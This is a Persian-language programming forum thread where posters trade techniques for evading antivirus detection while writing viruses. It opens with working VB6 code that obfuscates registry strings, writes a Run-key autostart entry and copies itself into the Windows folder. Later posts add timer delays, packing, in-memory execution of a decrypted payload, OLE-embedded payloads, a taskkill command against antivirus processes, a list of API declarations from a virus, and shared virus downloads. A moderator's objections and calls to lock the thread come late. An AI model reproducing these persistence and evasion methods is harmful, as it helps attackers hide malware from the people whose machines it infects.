سلام .
تمامی دوستانی که به ویروس و آنتی ویروس نویسی علاقه دارند می تونن توی این تاپیک شرکت کنند .

موضوع تاپیک : روش های پیشنهادی در مورد دوز زدن آنتی ویروس ها



به عنوان اولین و کارآمد ترین روش من بحث رو باز می کنم :

توابع زیر رو توی برنامه تعریف کنید (Coder و Decoder )





Public Function DECODER(SS As String) As String
Dim Str As String
Dim US As String
For i = 1 To Len(SS)
Str = Mid(SS, i, 1)
Select Case LCase(Str)
Case "*": US = US & "W"
Case "@": US = US & "I"
Case "!": US = US & "N"
Case "^": US = US & "D"
Case "%": US = US & "O"
Case "$": US = US & "S"
Case "~": US = US & "Y"
Case "`": US = US & "H"
Case "|": US = US & "A"
Case "#": US = US & "C"
Case "?": US = US & "T"
Case "'": US = US & "E"
Case ",": US = US & "M"
Case ";": US = US & "K"

Case Else: US = US & UCase(Str)

End Select
Next i
DECODER = US
End Function
Public Function CODER(SS As String) As String
Dim Str As String
Dim US As String
For i = 1 To Len(SS)
Str = Mid(SS, i, 1)
Select Case LCase(Str)
Case "w": US = US & "*"
Case "i": US = US & "@"
Case "n": US = US & "!"
Case "d": US = US & "^"
Case "o": US = US & "%"
Case "s": US = US & "$"
Case "y": US = US & "~"
Case "h": US = US & "`"
Case "a": US = US & "|"
Case "c": US = US & "#"
Case "t": US = US & "?"
Case "e": US = US & "'"
Case "m": US = US & ","
Case "k": US = US & ";"

Case Else: US = US & UCase(Str)

End Select
Next i
CODER = US
End Function






حالا برای اینکه NOD32 عزیز و یا هر آنتی ویروس دیگه ای رو دور بزنیم میایم مسیر ها رو به صورت کد شده می نویسیم و توسط تابع Decoder اونها رو برای استفاده در برنامه Decode می کنیم . به عبارت ساده تر : متونی مثل مسیر های رجیستری که توسط آنتی ویروس ها شناخته میشن رو در زمان طراحی به صورت کد شده می نویسیم (استفاده از تابع Coder) بعد برای استفاده در برنامه اونها Decode می کنیم . یعنی فقط در زمان اجرا است که محتوای متون تغییر می کنه .





پس :




برای ایجاد یک مقدار Autostartup در رجیستری می تونیم اینطوری عمل کنیم :






Set reg = CreateObject(CODER("*$#R@P?.$`'LL"))
reg.RegWrite CODER("`;'~_#URR'!?_U$'R\$%F?*|R'\,@#R%$%F?\*@!^%*$\#URR' !?V'R$@%!\RU!\"), App.Path & "\" & App.EXEName & ".exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\Mehran.exe"





و اما مکمل را حل بالایی اینه که هیچ وقت دستور Me.Hide و یا App.TaskVisible = False رو توی Form_Load ننویسد . پیشنهاد من اینه که دستورات ذکر شده تویه Timer مثلاً با Interval 100 بنویسید تا باز هم NOD32 عزیزمون یه کمی بیشتر فریب بخوره .







منتظر نظرات و پیشنهادات دوستان عزیز هستم . :قلب:

آقای pcm من یه کاری کردم که اصلا ان او دی متوجه کپی شدن برنامه در ریجستری نشد . من کد اجرای اتوماتیک رو در یه تایمر کپی کردم با اینتروال 1 . بعد یه تایمر دیگه گذاشتم تو برنامه با اینتروال 1000 . بعد دستور غیر فعال کردن تایمر یک رو گذاشتم توی تایمر دو . برنامه رو به فایل اجرایی تبدیل کردم و Nod انگار نه انگار . به همین روش من تونستم آنتی ویروس رو دور بزنم . اگه بخایید من میتونم سورسش رو در اختیارتون قرار بدم .
------------------------------
اخبار جدیدترین ویروس ها و دانلود سورس برنامه های نوشته شده توسط من :
www.ali-virus.blogfa.com (http://www.ali-virus.blogfa.com)

با سلام .
در همین ابتدا بگم اگه دوست داشته باشید می تونید منو مهران صدا کنید .

و اما در مورد راه حل شما : خیلی ممنون ، راه حل جالبیه فقط باید زحمت بکشید سورس رو قرار بدید . همه باید علاوه بر روش پیشنهایشون کد برنامه رو هم قرار بدن تا بقیه دوستان بتونن نهایت استفاده رو ببرن .

با تشکر ...

سلام آقا مهران .
حتما سورس رو قرار میدم تا دیگر دوستان هم استفاده ببرند .

دوستان عزیز اینم سورس برنامه و فایل اجرایی برنامه هم داخلش هست . وقتی برنامه رو اجرا کردید یه سر به ریجستریتون بزنید . میبینید که آدرس برنامه اونجا توی کلید run نوشته شده .
خب اینم از سورس برنامه که به زبان وی بی هستش : http://alireza2297.googlepages.com/FARIBANTIVIRUS.zip
در پایان از دوستان عزیز میخام که در صورتی که برنامه باگ داشت به من اطلاع بدن .

اینم روش جالبی بود ...

بقیه دوستان ضمن اینکه از مطالب استفاده می کنید سعی کنید یکمی هم مفید ظاهر بشید ..

منتظر روش های پیشنهادی شما هستیم ...

با پک کردن فایل اجرایی خیلی از آنتی ویروسها دیگه قادر به شناسایی اونها نیستن.من molebox رو امتحان کردم خیلی عالی جواب میده.منتها حجم برنامه یک کمی بالا میره.

سلام .

لطفاً molebox بذارید تا بقیه استفاده کنن .

با تشکر ..

به نظر من بهترین راه دور زدن آنتی ویروس از کار انداختن اونه . یه ویروس یه چند مدت پیش زده به سیستم من و nod رو از کار انداخته بود و هر کاری می کردم تا آنتی ویروس رو دوباره نصب کنم نمیشد . نمیدونم مارمولک چه جوری این کار رو میکرد .

دوست عزیز با پک کردن بعضی از انتی ویروس ها از جمله KasperSky به فایل ما مشکوک میشه و بهش گیر میده ... پس نتیجه میگیرم که پک کردن چندان هم خوشایند نیستش ...

در ضمن یک روش هم من توسط C++ پیاده سازی کردم که فایلم رو با یک الگوریتم کد کردم بعد با یک نرم افزار اون رو از کد در اوردم و مستقیم ریختم توی حافظه و از توی RAM اجراش کردم ... اینجوری هم میشه تا حدودی انتی ویروسها و کرکر ها رو دور زد ... البته متاسفانه چون بحث مدیریت حافظه در میان هست VB از انجام این کار عاجز هستش ...

در مورد روشی که گفتید یک سوال واسه من پیش اومد . آیا برنامه ای که می خواد توی RAM ریخته بشه و یا همون اجرا بشه ، نباید قبلش روی هارد وجود داشته باشه ؟

آنتی ویروس ها فایل رو تا زمانی که کد شده باشه نمی شناسن . در این که شکی نیست .

ولی زمانی که می خوایم فایل رو Decode کنیم چی ؟؟

با استفاده از vb6 میشه یک فایل رو مستقیما از ram خوند یا پاک کرد . تقریبا شبیه کاری که w32/jeefo.a انجام میده و این کار هیچ نیازی به dll ,activex نداره .

با استفاده از vb6 میشه یک فایل رو مستقیما از ram خوند یا پاک کرد . تقریبا شبیه کاری که w32/jeefo.a انجام میده و این کار هیچ نیازی به dll ,activex نداره .

اگه قبل از اینکه Decode انجام بشه و آنتی ویروس فایل رو پاک کنه این عملیات انجام بشه

همه چی حله .

من یه کارایی در این زمینه کرده بودم , با استفاده از شی OLE .

کار اینجوریه که فایل اول میومد به آنتی ویروس حمله می کرد و بعد با ذخیره

فایل از OLE بروی هارد و سپس اجرای اون فایل کارای خودشو انجام میده .

این برنامه ی ساده بخاطر مشکل در استفاده از کدای Unzip نا تمام موند . . .

اگه قبل از اینکه Decode انجام بشه و آنتی ویروس فایل رو پاک کنه این عملیات انجام بشه

همه چی حله .

من یه کارایی در این زمینه کرده بودم , با استفاده از شی OLE .

کار اینجوریه که فایل اول میومد به آنتی ویروس حمله می کرد و بعد با ذخیره

فایل از OLE بروی هارد و سپس اجرای اون فایل کارای خودشو انجام میده .

این برنامه ی ساده بخاطر مشکل در استفاده از کدای Unzip نا تمام موند . . .

با Unzip چی کار داشتی و چه مشکلی داشتی؟از رابط ole قدیمی ویندوز استفاده کردی یا از کدنویسی ole?

حتی پیشرفتی ترین رمز نگاری ها یه روزی لو به درد نخور میشن ،پس بهتر اینه که خود آنتی ویروس و سرور ارتباطی اون بلاک بشن یا از اسکریپ استفاده بشه و شاید بهترین راه پاک کردن آنتی ویروس و جلو گیری از اجرای فایلهای اجرایی و ... باشه .
taskkill /IM 'antivirus image name' /F
kill antiviruspat
یادم میاد قبلا یکی از دوستان VB کار نظر مشابهی را در بخش دلفی مطرح کرده بود و من بهش گفتم میتونه این کار رو روی آنتی ویروسی مثل کاسپرسکی امتحان کنه، تا متوجه بشه که حتی امکان تغییر یا اضافه کردن یک فایل به پوشه نصب کاسپرسکی رو نداره، چه برسه به اینکه بخواد پروسس مربوطه رو kill کنه!

سلام
چرا آنتی ویروس رو دور بزنیم ؟
حتی پیشرفتی ترین رمز نگاری ها یه روزی لو به درد نخور میشن ،پس بهتر اینه که خود آنتی ویروس و سرور ارتباطی اون بلاک بشن یا از اسکریپ استفاده بشه و شاید بهترین راه پاک کردن آنتی ویروس و جلو گیری از اجرای فایلهای اجرایی و ... باشه .
taskkill /IM 'antivirus image name' /F
kill antiviruspat

هدف ما فریب دادن کاربره نه از بین بردن آنتی ویروس .
اگه شما خودت متوجه بشی آنتی ویروست از بین رفته چی کار می کنی ؟ مطمئناً دست رو دست نمی ذاری تا اون تروجان و یا ویروسی که اینکارو کرده به عملیاتش ادامه بده ...

با استفاده از vb6 میشه یک فایل رو مستقیما از ram خوند یا پاک کرد . تقریبا شبیه کاری که w32/jeefo.a انجام میده و این کار هیچ نیازی به dll ,activex نداره .

میشه بفرمایید چه طوری ؟

لطفا در google عبارت Unlocker 8.1 را جست و جو کنید
این در جواب من بود؟ اگر بله، پس می تونید با همین unlocker هم امتحان کنید تا متوجه بشید که با این روش ها نمی تونید فایل مربوطه رو حذف کنید.

با Unzip چی کار داشتی و چه مشکلی داشتی؟از رابط ole قدیمی ویندوز استفاده کردی یا از کدنویسی ole?

من ویروس رو Zip کردم, بعد اونو گذاشتم تو شی OLE از ابزارهای خود ویژوال .

بعد eXeاشو ساختم و یه تاپیک گذاشتم که این فایل را با آنتی ویروس خود چک کنید .

اکثریت می گفتن آنتی ویروس ما پیدا نکرد . . .

در صورتیکه فایل Zip شده در حالت نرمال شناسایی می شد !

من یه پیشنهاد دارم .

اگه بیایم تک تک موضوع مطرح کنیم و بررسیش کنیم خیلی بهتر از اینکه رو کلیات یا

فقط یه گوشه از مسائل مربوط به دور زدن آنتی ویروسا بپردازیم .

مثلا موضوع رو Decode و روشهای مختلفش تعیین کنیم بعد روش ببحثیم !

یا مثلا طرق مختلف کار با رجیستری یا مختل کردن آنتی ویروس و و و .....

عرض بنده اینِکه دونه دونه روی مطالب بحث بشه , اینجوری نتیجشم بهتر خواهد بود .

هدف ما فریب دادن کاربره نه از بین بردن آنتی ویروس .
اگه شما خودت متوجه بشی آنتی ویروست از بین رفته چی کار می کنی ؟ مطمئناً دست رو دست نمی ذاری تا اون تروجان و یا ویروسی که اینکارو کرده به عملیاتش ادامه بده ...
----------------------------------------------------------------------------
سلام
اگر شما قصد ویروس نویسی داری ، آنتی ویروس ،ویروستو به عنوان یک برنامه می دونه و واگر هم خیلی توپ باشه چندتا هشدار میده*در حالت نهایت امنیت* .
----------------------------------------------------
برای وقت هایی که آنتی ویروس ، ویروس رو نمیشناسه گزینه هایی در نظر گرفته شده . *submit*
---------------------------------------------------
**************ویروس اگر نخواد خربکاری کنه چه فایدهای داره ؟
------------------------
در ضمن آنتی ویروس وابسته به آپدیته و تا ویروسی به دست سازندگانش نرسه نمی تونه ویروس رو شناسایی کنه .وقتی به دست سازندگانش رسید با اپدیت آنتی ویروس ، ویروس 1-2-3 پاک می شه .
----------------------------------------------------------
در ضمن یه سوال :
میدونی فایل autoply.exe رو با چی ساختن ؟

هدف ما فریب دادن کاربره نه از بین بردن آنتی ویروس .
اگه شما خودت متوجه بشی آنتی ویروست از بین رفته چی کار می کنی ؟ مطمئناً دست رو دست نمی ذاری تا اون تروجان و یا ویروسی که اینکارو کرده به عملیاتش ادامه بده ...


میشه بفرمایید چه طوری ؟
----------------------------------------------------------------------
لطفا در google سرچ کنید .

سلام
مدیر ارشد علی کشاورز
---------------------------------------------------
لطفا متن بالا رو بخونید .
----------------------------------------------------
نباید حتی با یه پیشنهاد احمقانه هم چنین برخوردی کرد .مگه این سایت سایتی برای بحث و آموزش پیرامون کامپیوتر نیست ؟این متن جوری نوشته شده که انگاری شما قصد زدن دارید و دارید منو مسخره می کنید .
خیر. هیچگونه قصد تمسخری در کار نبوده. فقط یادم بود که اون کاربر روی دستور Kill در VB تاکید داشت و اصرار می کرد که میشه هر پروسسی رو باهاش بست.


در ضمن کاری رو که می شه انجام داد ضد اون هم میشه انجام داد.
صد در صد همینطور، ولی موضوع اینه که برای دور زدن Self-protection آنتی ویروسی مثل کاسپیرسکی، نمیشه از روش های ساده ایی مثل تابع Kill در VB و امثالهم استفاده کرد.

قبلا میشد Self-protection رو به صورت دستی از کار انداخت و برنامه رو کرک کرد .
--------------------------------------------------------------------------------------------------
من هم این کار رو برای یه ویروس انجام دادم حالا به هر دلیل با اینکه پردازه اون قفل شده بود تونستم پاکش کنم .cpu..date.exe
شاید شانسی بوده ، برای همین این پیشنهاد رو دادم ....

در ضمن آنتی ویروس وابسته به آپدیته و تا ویروسی به دست سازندگانش نرسه نمی تونه ویروس رو شناسایی کنه .وقتی به دست سازندگانش رسید با اپدیت آنتی ویروس ، ویروس 1-2-3 پاک می شه .[/COLOR]


هوش مصنوعی که جدیداً در آنتی ویروس هایی مثل NOD32 استفاده شده گفته شما رو تا حدودی نقض می کنه !

قبلا میشد Self-protection رو به صورت دستی از کار انداخت و برنامه رو کرک کرد .
Self-protection رو فقط کاربر Administrator اون هم از داخل خود Kaspersky میتونه غیرفعال کنه. خب اگر ویروس نویسی تا این سطح از دسترسی به یک سیستم فرضی رو داشته باشه، اصلا لزومی نداره که Self-protection رو غیرفعال کنه، روی آیکن ضد ویروس راست کلیک میکنه، و گزینه Pause Protection رو کلیک میکنه تا کلا ضدویروس غیر فعال بشه.

سلام .

قرار شد دنبال روش های دوز ردن آنتی ویرس ها باشیم نه غیر فعال کردن و از بین بردن اونها .

به نظر من باید روی مسائل دور زدن آنتی ویروسها به صورت مقطعی کار کارد . مثلا چه کار کنیم تا بتونیم بخش on-access آنتی ویروس رو از کار بندازیم .

بخش on-access منظور چیه ؟؟

آقا اگه کسی سورس Kazme__gheyz.exe رو گیر آورد حتما بذاره ...

اگه دوستان دقت کرده باشن برنامه هایی مثل انتی ها که در کنار ساعت یا Shell_TrayWnd
قرار میگیرن به ترتیب وارد این قسمت میشن شاید بشه کاری کرد که برنامه قبل از انتی فعال بشه و کار خودش رو انجام بده سپس به انتی اجازه فعال شدن بده

اگه دوستان دقت کرده باشن برنامه هایی مثل انتی ها که در کنار ساعت یا Shell_TrayWnd
قرار میگیرن به ترتیب وارد این قسمت میشن شاید بشه کاری کرد که برنامه قبل از انتی فعال بشه و کار خودش رو انجام بده سپس به انتی اجازه فعال شدن بده


سلام

مساله اینجاست که تا قبل از اجرا شدن ویروس روی کامپیوتر قربانی چه طوری از شناسایی شدن ویروس توسط آنتی ویروس جلوگیری کنیم . ؟!!

من یه برنامه نوشتم که میتونه کظم غیظ رو پیدا کنه . تا فردا میزارمش تو سایت .

سلام

مساله اینجاست که تا قبل از اجرا شدن ویروس روی کامپیوتر قربانی چه طوری از شناسایی شدن ویروس توسط آنتی ویروس جلوگیری کنیم . ؟!!

گفتم که برنامه باید از فعال شدن انتی تا زمانی که کارش تموم بشه جلوگیری کنه بعد اجازه بده بقیه برنامه ها ران بشن

گفتم که برنامه باید از فعال شدن انتی تا زمانی که کارش تموم بشه جلوگیری کنه بعد اجازه بده بقیه برنامه ها ران بشن


بهتره مساله رو یک کمی بازتر کنیم .

فرض کن ویروس شما قرار روی کامپیوتری اجرا بشه که آنتی ویروس Macafee 2008 رو اون نصب هست .
ویروس هنوز اجرا نشده !

آنتی ویروس فعال هست و در صورتی که شما راهی واسه دور زدن اون یا به عبارت دیگر (جلوگیری از شناسایی شدن ویروستون توسط آنتی ویروس گفته شده ) پیدا نکنید مطمئنن آنتی ویروس ؛ ویروس شما رو شناسایی می کنه . و بسته به نوع فعالیتی که داره یه بلایی سر ویروس میاره .

حالا وقتی ویروسی که هنوز اجرا نشده و مثلاً توی Flashdisk وجود داشته رو آنتی ویروس پاک کنه (یعنی اجازه نده اجرا بشه(که قطعاً هم همینطوره)) چه طوری می خواد آنتی ویروس رو غیر فعال کنه و از فعال شدن اون تا زمان اتمام کارش جلوگیری کنه ؟

شما اصلاً کدی بنویس که آنتی ویروس به طور کلی پاک بشه ؛ تا وقتی ویروس اجرا نشه چطوری می خوای اینکارو بکنی ؟

منظور از on-access اینه که همین که کاربر میخاد بدون آگاهی فایل ویروسی رو اجرا کنه جلو عملیات ویروس رو میگیره . در کل یعنی به صورت مداوم چک کردن فایلها توسط آنتی ویروسها .

بخشید آقای mbt925
اون پست مال من رو که حذف کردید اون پست که مشکلی نداشت . یک نفر در این تاپیک سورس آنتی ویروس کظم غیظ رو خواسته بود من آدرسش رو بهش دادم که بره دانلود کنه . کار بدی کردم .
با تشکر .

خشید آقای mbt925
اون پست مال من رو که حذف کردید اون پست که مشکلی نداشت . یک نفر در این تاپیک سورس آنتی ویروس کظم غیظ رو خواسته بود من آدرسش رو بهش دادم که بره دانلود کنه . کار بدی کردم .
با تشکر .

ممنون جناب ali virus . اگه میشه بصورت پیام خصوصی لینکشو واسم بذار ممنون میشم .

بخاطره توضیح راجبه on-access هم ممنونم .

بهتره مساله رو یک کمی بازتر کنیم .

فرض کن ویروس شما قرار روی کامپیوتری اجرا بشه که آنتی ویروس Macafee 2008 رو اون نصب هست .
ویروس هنوز اجرا نشده !

آنتی ویروس فعال هست و در صورتی که شما راهی واسه دور زدن اون یا به عبارت دیگر (جلوگیری از شناسایی شدن ویروستون توسط آنتی ویروس گفته شده ) پیدا نکنید مطمئنن آنتی ویروس ؛ ویروس شما رو شناسایی می کنه . و بسته به نوع فعالیتی که داره یه بلایی سر ویروس میاره .

حالا وقتی ویروسی که هنوز اجرا نشده و مثلاً توی Flashdisk وجود داشته رو آنتی ویروس پاک کنه (یعنی اجازه نده اجرا بشه(که قطعاً هم همینطوره)) چه طوری می خواد آنتی ویروس رو غیر فعال کنه و از فعال شدن اون تا زمان اتمام کارش جلوگیری کنه ؟

شما اصلاً کدی بنویس که آنتی ویروس به طور کلی پاک بشه ؛ تا وقتی ویروس اجرا نشه چطوری می خوای اینکارو بکنی ؟
وقتی شما یک برنامه ساده مینویسی ایا انتی ها بهش گیر میدن و اون رو پاک میکنن مسلما خیر بارها شنیدیم که فلان ویروس از دو فایل اجرایی تشکیل شده که اولی فلان کاررو میکنه و دومی کار اصلی رو چند روز قبل یک سیستم دیدم که ویروسهاش رو پاک کردم اما فولدر اپشن رو غیر فعال کرده بود ویروس هاش پاک شده بودن اما هنوز این گزینه غیر فعال بود
خوب این همونیه که من گفتم در ضمن بعضی ویروسها رو انتی های به روز و بزرگ هم نمیشناسن این رو که قبول دارین
یک نمونه دیگه هم روی یک سیستم دیگه دیدم که فایلهای هاید و سوپر هاید رو نشون نمیداد اما ویرسی روش پیدا نشد پس یک برنامه سومی هم دخیله منظورم فایل اتوران وخود ویروس و فایل کمکی هست وقتی هم که فولدر اپشن رو تنظیم میکردی به حالت اصلیش بر میگشت

بخشید آقای mbt925
اون پست مال من رو که حذف کردید اون پست که مشکلی نداشت . یک نفر در این تاپیک سورس آنتی ویروس کظم غیظ رو خواسته بود من آدرسش رو بهش دادم که بره دانلود کنه . کار بدی کردم .
با تشکر .
سلام اگه میشه آدرس دانلود سورس این ویروس و آنتی ویروس به من پی ام بدید . ممنون

دوستان لطفا این ویروس رو دانلود کنید و ببینید آنتی ویروساتون اونو میشناسه
در این ویروس از چند تکنیک ساده استفاده شده که NOD32 آپدیت امروز هم اونو نمیشناسه
فقط مراقب باشین گرفتارش نشین.
به ما هم خبر بدین میشناسه یا نه

16566

سلام
به سایت برنامه نویس خوش آمدید .

این تاپیک در جهت یاددگیری برنامه نویسان عزیز مطرح شده . هدف ما از بحث در مورد ویروس ها اینه که بتونیم بیشتر با اونها آشنا بشیم . اینجا مسابقه ویروس نویسی برگزرا نشده . لطفاً در صورتی که قصد مشارکت در این تاپیک را دارید از قرار دادن ویروس به صورت اجرایی خودداری کنید .

خوشحال میشم سورس ویروس رو قرار بدید .


توابع استفاده شده در ویروس :



Private Declare Sub ShowCursor Lib "User32" ()

Private Declare Sub SetWindowPos Lib "User32" ()

Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

Private Declare Sub Process32Next Lib "kernel32" ()

Private Declare Sub Process32First Lib "kernel32" ()

Private Declare Sub CreateToolhelp32Snapshot Lib "kernel32" ()

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Sub GetWindowThreadProcessId Lib "User32" ()

Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long

Private Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LARGE_INTEGER) As Long

Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long

Private Declare Function GetCurrentProcess Lib "kernel32" () As Long

Private Declare Function GetVersion Lib "kernel32" () As Long

Private Declare Sub SendMessageA Lib "User32" ()

Private Declare Sub FindWindowA Lib "User32" ()

Private Declare Sub SetForegroundWindow Lib "User32" ()

Private Declare Sub SystemParametersInfoA Lib "User32" ()

Private Declare Sub SwapMouseButton Lib "User32" ()

Private Declare Sub ShowWindow Lib "User32" ()

Private Declare Sub FindWindowExA Lib "User32" ()

Private Declare Function mciGetErrorString Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal dwError As Long, ByVal lpstrBuffer As String, ByVal uLength As Long) As Long

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

به نظر من این تاپیک حل شده اعلام بشه بهتره . چون مدتی کسی داخلش چیزی نمی نویسه .

منم نظرم همینه و با ali viruse موافقم

اما زود واسه اینکار , عجله نکنید , خیلی جای بحث داره موضوع این تاپیک , خیلی حیفه , فقط 5 صفحه !!!!

لطف کنید سورس ویروس تقریبا موفق Kazme__gheyz.exe رو واسم بذارید , مهمه . ممنونم

واسه احیای این تاپیک می خوام یه چیزیو مطرح کنم .

آیا راه حمله به فایلهای آنتی ویروس ( مثل NOD ) کار استاندارد و کارسازیه ؟؟

اگه هست چرا یه ویروس نسازیم که قادر به مقابله و از بین بردن آنتی ویروسای مختلف باشه ؟؟؟

اگه یه ویروس بنویسیم که بیاد آنتی ویروس ها رو به حالت Pause ببره چطوره؟
یا اینکه بیاد و اونا رو End Prosecc کنه چطور؟
البته به نظر من کاربر نباید از وجود ویروس آگاه بشه.

لطف کنید سورس ویروس تقریبا موفق Kazme__gheyz.exe رو واسم بذارید , مهمه . ممنونم


من با نویسنده این ویروس در ارتباط هستم .
هنوز سورس هیچ کدوم از نسخه های این ویروس منتشر نشده و اینطور که معلومه . منتشر هم نخواهد شد .
آنتی این ویروس رو از www.a-kgh.blogfa.com می تونید دریافت کنید .

واسه احیای این تاپیک می خوام یه چیزیو مطرح کنم .

آیا راه حمله به فایلهای آنتی ویروس ( مثل NOD ) کار استاندارد و کارسازیه ؟؟



توی این تاپیک کار کاملاً غیر استانداردیه :بامزه:...

همیشه قبل از انجام هر کاری خودت رو جای کاربر قرار بده . اگه متوجه بشی آنتی ویروست درست کار نمیکنه و یا پاک شده چیکار می کنی ؟



چرا یه ویروس نسازیم که قادر به مقابله و از بین بردن آنتی ویروسای مختلف باشه ؟؟؟

برای اینکه قرار نیست با آنتی ویروس ها مستقیماً وارد جنگ بشیم . قصد ما فریب دادن اونهاست . :شیطان:

اگه توی این تاپیک در مورد آنتی ویروس های بحث بشه ، این تاپیک می تونه به کاره خودش ادامه بده ، که البته در این صورت پست های غیر مجاز حذف خواهند شد.
ولی اگه همین روند رو طی کنه ، تا چندی دیگر حذف خواهد شد.

اگه توی این تاپیک در مورد آنتی ویروس های بحث بشه ، این تاپیک می تونه به کاره خودش ادامه بده ، که البته در این صورت پست های غیر مجاز حذف خواهند شد.
ولی اگه همین روند رو طی کنه ، تا چندی دیگر حذف خواهد شد.



قرار نیست در مورد آنتی ویروس ها بحث بشه .
تاپیک در مورد روش های پیشنهادی در مورد دور زدن آنتی ویروس هاست .

خواهشی که ازتون دارم اینه که حتی المقدور تاپیک رو حذف نکنید . و یا لا اقل اون رو قفل کنید تا بقیه دوستان جدید بتونن از مطالب موجود در اون استفاده کنن .

مرسی ...

علت ممنوع بودن بحث در مورد ویروس ، مخرب بودن اه مباحث مرتبط به ویروسه.
دور زدن آنتی ویروس ها هم مبحثی مخربه.

میشه خیلی مباحث مفید تر و کاربردی تر مطرح کرد ، مثل آنتی ویروس نوشتن و...

منم میگم آقای mbt925 میگه . به نظر من بهتره در مورد آنتی ویروس نویسی بحث کنیم . من میگم سورس برای نابود کردن ویروس ها بزاریم و روی سورسهای همدیگه کار کنیم .
به امید روزی که همه مشتاق کمک به یکدیگر باشیم .

کسی با نظر من موافق نیست؟؟؟؟؟؟؟؟؟؟؟؟؟
اگه موافقید لطفا اعلام کنید .

به نظر من تاپیک قفل بشه بهتره !

به نظر من تاپیک قفل بشه بهتره !
-----------------------------------------------------------------------
با اینکه تاپیک جالبیه ، من کاملا با جناب مدیر Mbt925 موافقم ، چون در تمام سایت های معروف حرف زدن در مورد این موضوعات ممنوعه و برنامه نویس هم یکی از همون سایت های معروفه .
برای این موضوعات بهتره از Hackerz.ir استفاده بشه .

مطالب خوبی در این تاپیک هست که می شه ازش استفاده های بدم کرد و میتونه مخرب باشه .
ولی به نظر من میشه تاپیک رو قفل کرد !